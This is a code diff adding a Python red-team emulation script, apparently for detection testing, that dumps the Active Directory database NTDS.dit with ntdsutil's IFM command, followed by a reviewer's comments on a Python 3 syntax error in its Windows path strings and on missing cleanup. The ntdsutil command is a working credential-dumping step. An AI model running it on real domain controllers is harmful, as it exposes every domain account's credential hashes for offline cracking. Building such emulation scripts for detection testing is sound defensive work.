diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
new file mode 100644
index 0000000..9a3099b
--- /dev/null
+++ b/red_ttp/ntdsutil_dump_ad.py
@@ -0,0 +1,47 @@
+# Name: Dump Active Directory Database with NTDSUTIL
+# rta: ntdsutil_dump_ad.py
+# ATT&CK: T1003
+# Description: Dumps the Active Directory database, ntds.dit, to disk for offline credential access attacks.
+
+import os
+import common
+import errno
+
+NTDSUTIL = "ntdsutil.exe"
+ACTIVATE = "activate instance ntds"
+IFM = "IFM"
+DUMPDIR = "C:\Windows\Temp\RTA"
+CREATE = "create full " + DUMPDIR
+NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"
+
+
+def main():
+
+    common.log("Ensuring dump folder exists...")
+    if os.path.exists(DUMPDIR):
+        common.log("Dump folder already exists, moving on!")
+    else:
+        common.log("Dump folder doesn't exist, creating...")
+        try:
+            os.makedirs(DUMPDIR)
+        except OSError as e:
+            if e.errno != errno.EEXIST:
+                common.log("Failed to create dump folder!")
+                raise
+
+
+    common.log("Executing ntdsutil.exe...")
+    code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"])
+
+    if code == 0:
+        common.log("Successfully executed ntdsutil.exe!")
+    else:
+        common.log("Did not successfully execute ntdsutil.exe.")
+    if os.path.exists(NTDSDIT_FILE):
+        common.log("Successfully dumped Active Directory to " + NTDSDIT_FILE)
+    else:
+        common.log("Did not successfully create NTDS.dit file.")
+
+
+if __name__ == "__main__":
+    exit(main())
\ No newline at end of file
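Review bot: The Windows paths in `DUMPDIR = "C:\Windows\Temp\RTA"` and `NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"` are plain (non-raw) string literals, so every backslash is parsed as an escape: `\W`, `\T`, `\R` and `\A` only survive because Python leaves unknown escapes in place (with a DeprecationWarning/SyntaxWarning on current interpreters), and `\N` is the named-unicode-escape prefix, which makes the `NTDSDIT_FILE` literal a SyntaxError under Python 3 — the file would not even import there. Use raw strings and `os.path.join` instead: `DUMPDIR = r"C:\Windows\Temp\RTA"` and `NTDSDIT_FILE = os.path.join(DUMPDIR, "Active Directory", "NTDS.dit")`. Separately, `main()` confirms the dump exists but never removes it, so a successful run leaves a full NTDS.dit copy (domain credential material) on the test host; deleting `DUMPDIR` after the existence check, and logging that cleanup, would keep the artifact from outliving the detection exercise. The `output` value returned by `common.execute` is also unused and could be dropped or logged.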